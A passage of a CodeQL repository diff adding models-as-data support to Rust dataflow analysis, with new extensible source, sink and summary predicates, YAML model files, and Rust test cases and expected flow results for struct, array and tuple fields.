.../rust/dataflow/internal/empty.model.yml | 17 +++ .../frameworks/stdlib/lang-core.model.yml | 6 + rust/ql/lib/qlpack.yml | 2 + .../dataflow/local/inline-flow.expected | 3 +- .../library-tests/dataflow/models/main.rs | 91 ++++++++++++ .../dataflow/models/models.expected | 129 ++++++++++++++++-- .../dataflow/models/models.ext.yml | 17 +++ .../library-tests/dataflow/models/models.ql | 60 -------- .../security/CWE-089/SqlInjection.qlref | 4 +- rust/ql/test/utils/InlineFlowTest.qll | 3 +- rust/ql/test/utils/PrettyPrintModels.ql | 7 + rust/ql/test/utils/ProvenancePathGraph.qll | 8 ++ 16 files changed, 392 insertions(+), 87 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll create mode 100644 rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml create mode 100644 rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml create mode 100644 rust/ql/test/library-tests/dataflow/models/models.ext.yml create mode 100644 rust/ql/test/utils/PrettyPrintModels.ql create mode 100644 rust/ql/test/utils/ProvenancePathGraph.qll diff --git a/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll b/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll index f0457c960ce..d1ba69ba22d 100644 --- a/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll +++ b/rust/ql/lib/codeql/rust/dataflow/FlowSummary.qll @@ -7,17 +7,7 @@ private import codeql.rust.elements.internal.CallExprBaseImpl::Impl as CallExprB // import all instances below private module Summaries { private import codeql.rust.Frameworks - - // TODO: Use models-as-data when it's available - private class UnwrapSummary extends SummarizedCallable::Range { - UnwrapSummary() { this = "lang:core::_::::unwrap" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[self].Variant[crate::option::Option::Some(0)]" and - output = "ReturnValue" and - preservesValue = true - } - } + private import codeql.rust.dataflow.internal.ModelsAsData } /** Provides the `Range` class used to define the extent of `LibraryCallable`. */ @@ -62,7 +52,7 @@ module SummarizedCallable { * * `preservesValue` indicates whether this is a value-preserving step or a taint-step. */ - abstract predicate propagatesFlow(string input, string output, boolean preservesValue); + predicate propagatesFlow(string input, string output, boolean preservesValue) { none() } } } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 80fb80e7dc6..068429ce09b 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -597,7 +597,7 @@ private class VariantFieldContent extends VariantContent, TVariantFieldContent { } /** A canonical path pointing to a struct. */ -private class StructCanonicalPath extends MkStructCanonicalPath { +class StructCanonicalPath extends MkStructCanonicalPath { CrateOriginOption crate; string path; @@ -606,6 +606,8 @@ private class StructCanonicalPath extends MkStructCanonicalPath { /** Gets the underlying struct. */ Struct getStruct() { hasExtendedCanonicalPath(result, crate, path) } + string getExtendedCanonicalPath() { result = path } + string toString() { result = this.getStruct().getName().getText() } Location getLocation() { result = this.getStruct().getLocation() } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll index 3503ad07332..492764b3cf5 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/FlowSummaryImpl.qll @@ -32,6 +32,22 @@ module Input implements InputSig { arg = v.getExtendedCanonicalPath() + "::" + field ) ) + or + exists(StructCanonicalPath s, string field | + result = "Struct" and + c = TStructFieldContent(s, field) and + arg = s.getExtendedCanonicalPath() + "::" + field + ) + or + result = "ArrayElement" and + c = TArrayElement() and + arg = "" + or + exists(int pos | + result = "Tuple" and + c = TTuplePositionContent(pos) and + arg = pos.toString() + ) ) } diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll b/rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll new file mode 100644 index 00000000000..ebffe41a185 --- /dev/null +++ b/rust/ql/lib/codeql/rust/dataflow/internal/ModelsAsData.qll @@ -0,0 +1,98 @@ +/** + * Defines extensible predicates for contributing library models from data extensions. + */ + +private import rust +private import codeql.rust.dataflow.FlowSummary + +/** + * Holds if in a call to the function with canonical path `path`, defined in the + * crate `crate`, the value referred to by `output` is a flow source of the given + * `kind`. + * + * `output = "ReturnValue"` simply means the result of the call itself. + * + * The following kinds are supported: + * + * - `remote`: a general remote flow source. + */ +extensible predicate sourceModel( + string crate, string path, string output, string kind, string provenance, + QlBuiltins::ExtensionId madId +); + +/** + * Holds if in a call to the function with canonical path `path`, defined in the + * crate `crate`, the value referred to by `input` is a flow sink of the given + * `kind`. + * + * For example, `input = Argument[0]` means the first argument of the call. + * + * The following kinds are supported: + * + * - `sql-injection`: a flow sink for SQL injection. + */ +extensible predicate sinkModel( + string crate, string path, string input, string kind, string provenance, + QlBuiltins::ExtensionId madId +); + +/** + * Holds if in a call to the function with canonical path `path`, defined in the + * crate `crate`, the value referred to by `input` can flow to the value referred + * to by `output`. + * + * `kind` should be either `value` or `taint`, for value-preserving or taint-preserving + * steps, respectively. + */ +extensible predicate summaryModel( + string crate, string path, string input, string output, string kind, string provenance, + QlBuiltins::ExtensionId madId +); + +/** + * Holds if the given extension tuple `madId` should pretty-print as `model`. + * + * This predicate should only be used in tests. + */ +predicate interpretModelForTest(QlBuiltins::ExtensionId madId, string model) { + exists(string crate, string path, string output, string kind | + sourceModel(crate, path, kind, output, _, madId) and + model = "Source: " + crate + "; " + path + "; " + output + "; " + kind + ) + or + exists(string crate, string path, string input, string kind | + sinkModel(crate, path, kind, input, _, madId) and + model = "Sink: " + crate + "; " + path + "; " + input + "; " + kind + ) + or + exists(string type, string path, string input, string output, string kind | + summaryModel(type, path, input, output, kind, _, madId) and + model = "Summary: " + type + "; " + path + "; " + input + "; " + output + "; " + kind + ) +} + +private class SummarizedCallableFromModel extends SummarizedCallable::Range { + private string crate; + private string path; + + SummarizedCallableFromModel() { + summaryModel(crate, path, _, _, _, _, _) and + this = crate + "::_::" + path + } + + override predicate propagatesFlow( + string input, string output, boolean preservesValue, string model + ) { + exists(string kind, QlBuiltins::ExtensionId madId | + summaryModel(crate, path, input, output, kind, _, madId) and + model = "MaD:" + madId.toString() + | + kind = "value" and + preservesValue = true + or + kind = "taint" and + preservesValue = false + ) + } +} diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml b/rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml new file mode 100644 index 00000000000..1a33951dfc3 --- /dev/null +++ b/rust/ql/lib/codeql/rust/dataflow/internal/empty.model.yml @@ -0,0 +1,17 @@ +extensions: + # Make sure that the extensible model predicates have at least one definition + # to avoid errors about undefined extensionals. + - addsTo: + pack: codeql/rust-all + extensible: sourceModel + data: [] + + - addsTo: + pack: codeql/rust-all + extensible: sinkModel + data: [] + + - addsTo: + pack: codeql/rust-all + extensible: summaryModel + data: [] diff --git a/rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml b/rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml new file mode 100644 index 00000000000..db61e6c70b5 --- /dev/null +++ b/rust/ql/lib/codeql/rust/frameworks/stdlib/lang-core.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/rust-all + extensible: summaryModel + data: + - ["lang:core", "::unwrap", "Argument[self].Variant[crate::option::Option::Some(0)]", "ReturnValue", "value", "manual"] diff --git a/rust/ql/lib/qlpack.yml b/rust/ql/lib/qlpack.yml index 53ccf6dfced..181e992287c 100644 --- a/rust/ql/lib/qlpack.yml +++ b/rust/ql/lib/qlpack.yml @@ -13,4 +13,6 @@ dependencies: codeql/ssa: ${workspace} codeql/tutorial: ${workspace} codeql/util: ${workspace} +dataExtensions: + - /**/*.model.yml warnOnImplicitThis: true diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index 9ee2f23f08c..d464f562581 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -1,4 +1,5 @@ models +| 1 | Summary: lang:core; ::unwrap; Argument[self].Variant[crate::option::Option::Some(0)]; ReturnValue; value | edges | main.rs:19:13:19:21 | source(...) | main.rs:20:10:20:10 | s | provenance | | | main.rs:24:13:24:21 | source(...) | main.rs:27:10:27:10 | c | provenance | | @@ -35,7 +36,7 @@ edges | main.rs:214:14:214:14 | n | main.rs:214:25:214:25 | n | provenance | | | main.rs:224:14:224:29 | Some(...) [Some] | main.rs:225:10:225:11 | s1 [Some] | provenance | | | main.rs:224:19:224:28 | source(...) | main.rs:224:14:224:29 | Some(...) [Some] | provenance | | -| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | s1.unwrap(...) | provenance | | +| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | s1.unwrap(...) | provenance | MaD:1 | | main.rs:229:14:229:29 | Some(...) [Some] | main.rs:231:14:231:15 | s1 [Some] | provenance | | | main.rs:229:19:229:28 | source(...) | main.rs:229:14:229:29 | Some(...) [Some] | provenance | | | main.rs:231:14:231:15 | s1 [Some] | main.rs:231:14:231:16 | TryExpr | provenance | | diff --git a/rust/ql/test/library-tests/dataflow/models/main.rs b/rust/ql/test/library-tests/dataflow/models/main.rs index 337cec5a220..dbff546732a 100644 --- a/rust/ql/test/library-tests/dataflow/models/main.rs +++ b/rust/ql/test/library-tests/dataflow/models/main.rs @@ -90,11 +90,102 @@ fn test_set_var_field() { } } +struct MyStruct { + field1: i64, + field2: i64, +} + +// has a flow model +fn get_struct_field(s: MyStruct) -> i64 { + 0 +} + +fn test_get_struct_field() { + let s = source(6); + let my_struct = MyStruct { + field1: s, + field2: 0, + }; + sink(get_struct_field(my_struct)); // $ hasValueFlow=6 + let my_struct2 = MyStruct { + field1: 0, + field2: s, + }; + sink(get_struct_field(my_struct2)); +} + +// has a flow model +fn set_struct_field(i: i64) -> MyStruct { + MyStruct { + field1: 0, + field2: 1, + } +} + +fn test_set_struct_field() { + let s = source(7); + let my_struct = set_struct_field(s); + sink(my_struct.field1); + sink(my_struct.field2); // $ MISSING: hasValueFlow=7 +} + +// has a flow model +fn get_array_element(a: [i64; 1]) -> i64 { + 0 +} + +fn test_get_array_element() { + let s = source(8); + sink(get_array_element([s])); // $ hasValueFlow=8 +} + +// has a flow model +fn set_array_element(i: i64) -> [i64; 1] { + [0] +} + +fn test_set_array_element() { + let s = source(9); + let arr = set_array_element(s); + sink(arr[0]); // $ hasValueFlow=9 +} + +// has a flow model +fn get_tuple_element(a: (i64, i64)) -> i64 { + 0 +} + +fn test_get_tuple_element() { + let s = source(10); + let t = (s, 0); + sink(get_tuple_element(t)); // $ hasValueFlow=10 + let t = (0, s); + sink(get_tuple_element(t)); +} + +// has a flow model +fn set_tuple_element(i: i64) -> (i64, i64) { + (0, 1) +} + +fn test_set_tuple_element() { + let s = source(11); + let t = set_tuple_element(s); + sink(t.0); + sink(t.1); // $ hasValueFlow=11 +} + fn main() { test_identify(); test_get_var_pos(); test_set_var_pos(); test_get_var_field(); test_set_var_field(); + test_get_struct_field(); + test_set_struct_field(); + test_get_array_element(); + test_set_array_element(); + test_get_tuple_element(); + test_set_tuple_element(); let dummy = Some(0); // ensure that the the `lang:core` crate is extracted } diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index 6ebc72099ca..5b0d5c1588e 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected @@ -1,25 +1,36 @@ models +| 1 | Summary: repo::test; crate::coerce; Argument[0]; ReturnValue; taint | +| 2 | Summary: repo::test; crate::get_array_element; Argument[0].ArrayElement; ReturnValue; value | +| 3 | Summary: repo::test; crate::get_struct_field; Argument[0].Struct[crate::MyStruct::field1]; ReturnValue; value | +| 4 | Summary: repo::test; crate::get_tuple_element; Argument[0].Tuple[0]; ReturnValue; value | +| 5 | Summary: repo::test; crate::get_var_field; Argument[0].Variant[crate::MyFieldEnum::C::field_c]; ReturnValue; value | +| 6 | Summary: repo::test; crate::get_var_pos; Argument[0].Variant[crate::MyPosEnum::A(0)]; ReturnValue; value | +| 7 | Summary: repo::test; crate::identity; Argument[0]; ReturnValue; value | +| 8 | Summary: repo::test; crate::set_array_element; Argument[0]; ReturnValue.ArrayElement; value | +| 9 | Summary: repo::test; crate::set_tuple_element; Argument[0]; ReturnValue.Tuple[1]; value | +| 10 | Summary: repo::test; crate::set_var_field; Argument[0]; ReturnValue.Variant[crate::MyFieldEnum::D::field_d]; value | +| 11 | Summary: repo::test; crate::set_var_pos; Argument[0]; ReturnValue.Variant[crate::MyPosEnum::B(0)]; value | edges | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | -| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | -| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | +| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | MaD:7 | +| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | MaD:7 | | main.rs:25:13:25:22 | source(...) | main.rs:26:17:26:17 | s | provenance | | -| main.rs:26:17:26:17 | s | main.rs:26:10:26:18 | coerce(...) | provenance | | +| main.rs:26:17:26:17 | s | main.rs:26:10:26:18 | coerce(...) | provenance | MaD:1 | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | | main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | | main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | | main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | -| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | -| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | MaD:6 | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | MaD:6 | | main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | | main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | | main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | | main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | -| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | -| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | MaD:11 | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | MaD:11 | | main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | | main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | | main.rs:57:22:57:22 | i | main.rs:57:33:57:33 | i | provenance | | @@ -30,18 +41,56 @@ edges | main.rs:73:14:73:42 | ...::C {...} [C] | main.rs:74:24:74:25 | e1 [C] | provenance | | | main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | | main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | -| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | -| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | MaD:5 | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | MaD:5 | | main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | | main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | | main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | | main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | -| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | -| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | MaD:10 | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | MaD:10 | | main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | | main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | | main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | | main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | +| main.rs:104:13:104:21 | source(...) | main.rs:106:17:106:17 | s | provenance | | +| main.rs:104:13:104:21 | source(...) | main.rs:106:17:106:17 | s | provenance | | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | main.rs:109:27:109:35 | my_struct [MyStruct.field1] | provenance | | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | main.rs:109:27:109:35 | my_struct [MyStruct.field1] | provenance | | +| main.rs:106:17:106:17 | s | main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | provenance | | +| main.rs:106:17:106:17 | s | main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | provenance | | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | main.rs:109:10:109:36 | get_struct_field(...) | provenance | MaD:3 | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | main.rs:109:10:109:36 | get_struct_field(...) | provenance | MaD:3 | +| main.rs:138:13:138:21 | source(...) | main.rs:139:29:139:29 | s | provenance | | +| main.rs:138:13:138:21 | source(...) | main.rs:139:29:139:29 | s | provenance | | +| main.rs:139:28:139:30 | [...] [array[]] | main.rs:139:10:139:31 | get_array_element(...) | provenance | MaD:2 | +| main.rs:139:28:139:30 | [...] [array[]] | main.rs:139:10:139:31 | get_array_element(...) | provenance | MaD:2 | +| main.rs:139:29:139:29 | s | main.rs:139:28:139:30 | [...] [array[]] | provenance | | +| main.rs:139:29:139:29 | s | main.rs:139:28:139:30 | [...] [array[]] | provenance | | +| main.rs:148:13:148:21 | source(...) | main.rs:149:33:149:33 | s | provenance | | +| main.rs:148:13:148:21 | source(...) | main.rs:149:33:149:33 | s | provenance | | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | main.rs:150:10:150:12 | arr [array[]] | provenance | | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | main.rs:150:10:150:12 | arr [array[]] | provenance | | +| main.rs:149:33:149:33 | s | main.rs:149:15:149:34 | set_array_element(...) [array[]] | provenance | MaD:8 | +| main.rs:149:33:149:33 | s | main.rs:149:15:149:34 | set_array_element(...) [array[]] | provenance | MaD:8 | +| main.rs:150:10:150:12 | arr [array[]] | main.rs:150:10:150:15 | arr[0] | provenance | | +| main.rs:150:10:150:12 | arr [array[]] | main.rs:150:10:150:15 | arr[0] | provenance | | +| main.rs:159:13:159:22 | source(...) | main.rs:160:14:160:14 | s | provenance | | +| main.rs:159:13:159:22 | source(...) | main.rs:160:14:160:14 | s | provenance | | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | main.rs:161:28:161:28 | t [tuple.0] | provenance | | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | main.rs:161:28:161:28 | t [tuple.0] | provenance | | +| main.rs:160:14:160:14 | s | main.rs:160:13:160:18 | TupleExpr [tuple.0] | provenance | | +| main.rs:160:14:160:14 | s | main.rs:160:13:160:18 | TupleExpr [tuple.0] | provenance | | +| main.rs:161:28:161:28 | t [tuple.0] | main.rs:161:10:161:29 | get_tuple_element(...) | provenance | MaD:4 | +| main.rs:161:28:161:28 | t [tuple.0] | main.rs:161:10:161:29 | get_tuple_element(...) | provenance | MaD:4 | +| main.rs:172:13:172:22 | source(...) | main.rs:173:31:173:31 | s | provenance | | +| main.rs:172:13:172:22 | source(...) | main.rs:173:31:173:31 | s | provenance | | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | main.rs:175:10:175:10 | t [tuple.1] | provenance | | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | main.rs:175:10:175:10 | t [tuple.1] | provenance | | +| main.rs:173:31:173:31 | s | main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | provenance | MaD:9 | +| main.rs:173:31:173:31 | s | main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | provenance | MaD:9 | +| main.rs:175:10:175:10 | t [tuple.1] | main.rs:175:10:175:12 | t.1 | provenance | | +| main.rs:175:10:175:10 | t [tuple.1] | main.rs:175:10:175:12 | t.1 | provenance | | nodes | main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | | main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | @@ -96,6 +145,54 @@ nodes | main.rs:89:35:89:35 | i | semmle.label | i | | main.rs:89:47:89:47 | i | semmle.label | i | | main.rs:89:47:89:47 | i | semmle.label | i | +| main.rs:104:13:104:21 | source(...) | semmle.label | source(...) | +| main.rs:104:13:104:21 | source(...) | semmle.label | source(...) | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | semmle.label | MyStruct {...} [MyStruct.field1] | +| main.rs:105:21:108:5 | MyStruct {...} [MyStruct.field1] | semmle.label | MyStruct {...} [MyStruct.field1] | +| main.rs:106:17:106:17 | s | semmle.label | s | +| main.rs:106:17:106:17 | s | semmle.label | s | +| main.rs:109:10:109:36 | get_struct_field(...) | semmle.label | get_struct_field(...) | +| main.rs:109:10:109:36 | get_struct_field(...) | semmle.label | get_struct_field(...) | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | semmle.label | my_struct [MyStruct.field1] | +| main.rs:109:27:109:35 | my_struct [MyStruct.field1] | semmle.label | my_struct [MyStruct.field1] | +| main.rs:138:13:138:21 | source(...) | semmle.label | source(...) | +| main.rs:138:13:138:21 | source(...) | semmle.label | source(...) | +| main.rs:139:10:139:31 | get_array_element(...) | semmle.label | get_array_element(...) | +| main.rs:139:10:139:31 | get_array_element(...) | semmle.label | get_array_element(...) | +| main.rs:139:28:139:30 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:139:28:139:30 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:139:29:139:29 | s | semmle.label | s | +| main.rs:139:29:139:29 | s | semmle.label | s | +| main.rs:148:13:148:21 | source(...) | semmle.label | source(...) | +| main.rs:148:13:148:21 | source(...) | semmle.label | source(...) | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | semmle.label | set_array_element(...) [array[]] | +| main.rs:149:15:149:34 | set_array_element(...) [array[]] | semmle.label | set_array_element(...) [array[]] | +| main.rs:149:33:149:33 | s | semmle.label | s | +| main.rs:149:33:149:33 | s | semmle.label | s | +| main.rs:150:10:150:12 | arr [array[]] | semmle.label | arr [array[]] | +| main.rs:150:10:150:12 | arr [array[]] | semmle.label | arr [array[]] | +| main.rs:150:10:150:15 | arr[0] | semmle.label | arr[0] | +| main.rs:150:10:150:15 | arr[0] | semmle.label | arr[0] | +| main.rs:159:13:159:22 | source(...) | semmle.label | source(...) | +| main.rs:159:13:159:22 | source(...) | semmle.label | source(...) | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | +| main.rs:160:13:160:18 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | +| main.rs:160:14:160:14 | s | semmle.label | s | +| main.rs:160:14:160:14 | s | semmle.label | s | +| main.rs:161:10:161:29 | get_tuple_element(...) | semmle.label | get_tuple_element(...) | +| main.rs:161:10:161:29 | get_tuple_element(...) | semmle.label | get_tuple_element(...) | +| main.rs:161:28:161:28 | t [tuple.0] | semmle.label | t [tuple.0] | +| main.rs:161:28:161:28 | t [tuple.0] | semmle.label | t [tuple.0] | +| main.rs:172:13:172:22 | source(...) | semmle.label | source(...) | +| main.rs:172:13:172:22 | source(...) | semmle.label | source(...) | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | semmle.label | set_tuple_element(...) [tuple.1] | +| main.rs:173:13:173:32 | set_tuple_element(...) [tuple.1] | semmle.label | set_tuple_element(...) [tuple.1] | +| main.rs:173:31:173:31 | s | semmle.label | s | +| main.rs:173:31:173:31 | s | semmle.label | s | +| main.rs:175:10:175:10 | t [tuple.1] | semmle.label | t [tuple.1] | +| main.rs:175:10:175:10 | t [tuple.1] | semmle.label | t [tuple.1] | +| main.rs:175:10:175:12 | t.1 | semmle.label | t.1 | +| main.rs:175:10:175:12 | t.1 | semmle.label | t.1 | subpaths testFailures invalidSpecComponent @@ -111,3 +208,13 @@ invalidSpecComponent | main.rs:74:10:74:26 | get_var_field(...) | main.rs:72:13:72:21 | source(...) | main.rs:74:10:74:26 | get_var_field(...) | $@ | main.rs:72:13:72:21 | source(...) | source(...) | | main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | | main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | +| main.rs:109:10:109:36 | get_struct_field(...) | main.rs:104:13:104:21 | source(...) | main.rs:109:10:109:36 | get_struct_field(...) | $@ | main.rs:104:13:104:21 | source(...) | source(...) | +| main.rs:109:10:109:36 | get_struct_field(...) | main.rs:104:13:104:21 | source(...) | main.rs:109:10:109:36 | get_struct_field(...) | $@ | main.rs:104:13:104:21 | source(...) | source(...) | +| main.rs:139:10:139:31 | get_array_element(...) | main.rs:138:13:138:21 | source(...) | main.rs:139:10:139:31 | get_array_element(...) | $@ | main.rs:138:13:138:21 | source(...) | source(...) | +| main.rs:139:10:139:31 | get_array_element(...) | main.rs:138:13:138:21 | source(...) | main.rs:139:10:139:31 | get_array_element(...) | $@ | main.rs:138:13:138:21 | source(...) | source(...) | +| main.rs:150:10:150:15 | arr[0] | main.rs:148:13:148:21 | source(...) | main.rs:150:10:150:15 | arr[0] | $@ | main.rs:148:13:148:21 | source(...) | source(...) | +| main.rs:150:10:150:15 | arr[0] | main.rs:148:13:148:21 | source(...) | main.rs:150:10:150:15 | arr[0] | $@ | main.rs:148:13:148:21 | source(...) | source(...) | +| main.rs:161:10:161:29 | get_tuple_element(...) | main.rs:159:13:159:22 | source(...) | main.rs:161:10:161:29 | get_tuple_element(...) | $@ | main.rs:159:13:159:22 | source(...) | source(...) | +| main.rs:161:10:161:29 | get_tuple_element(...) | main.rs:159:13:159:22 | source(...) | main.rs:161:10:161:29 | get_tuple_element(...) | $@ | main.rs:159:13:159:22 | source(...) | source(...) | +| main.rs:175:10:175:12 | t.1 | main.rs:172:13:172:22 | source(...) | main.rs:175:10:175:12 | t.1 | $@ | main.rs:172:13:172:22 | source(...) | source(...) | +| main.rs:175:10:175:12 | t.1 | main.rs:172:13:172:22 | source(...) | main.rs:175:10:175:12 | t.1 | $@ | main.rs:172:13:172:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/models/models.ext.yml b/rust/ql/test/library-tests/dataflow/models/models.ext.yml new file mode 100644 index 00000000000..80a19b3e8da --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/models/models.ext.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/rust-all + extensible: summaryModel + data: + - ["repo::test", "crate::identity", "Argument[0]", "ReturnValue", "value", "manual"] + - ["repo::test", "crate::coerce", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["repo::test", "crate::get_var_pos", "Argument[0].Variant[crate::MyPosEnum::A(0)]", "ReturnValue", "value", "manual"] + - ["repo::test", "crate::set_var_pos", "Argument[0]", "ReturnValue.Variant[crate::MyPosEnum::B(0)]", "value", "manual"] + - ["repo::test", "crate::get_var_field", "Argument[0].Variant[crate::MyFieldEnum::C::field_c]", "ReturnValue", "value", "manual"] + - ["repo::test", "crate::set_var_field", "Argument[0]", "ReturnValue.Variant[crate::MyFieldEnum::D::field_d]", "value", "manual"] + - ["repo::test", "crate::get_struct_field", "Argument[0].Struct[crate::MyStruct::field1]", "ReturnValue", "value", "manual"] + - ["repo::test", "crate::set_struct_field", "Argument[0]", "ReturnValue.Struct[crate::MyStruct::field2]", "value", "manual"] + - ["repo::test", "crate::get_array_element", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["repo::test", "crate::set_array_element", "Argument[0]", "ReturnValue.ArrayElement", "value", "manual"] + - ["repo::test", "crate::get_tuple_element", "Argument[0].Tuple[0]", "ReturnValue", "value", "manual"] + - ["repo::test", "crate::set_tuple_element", 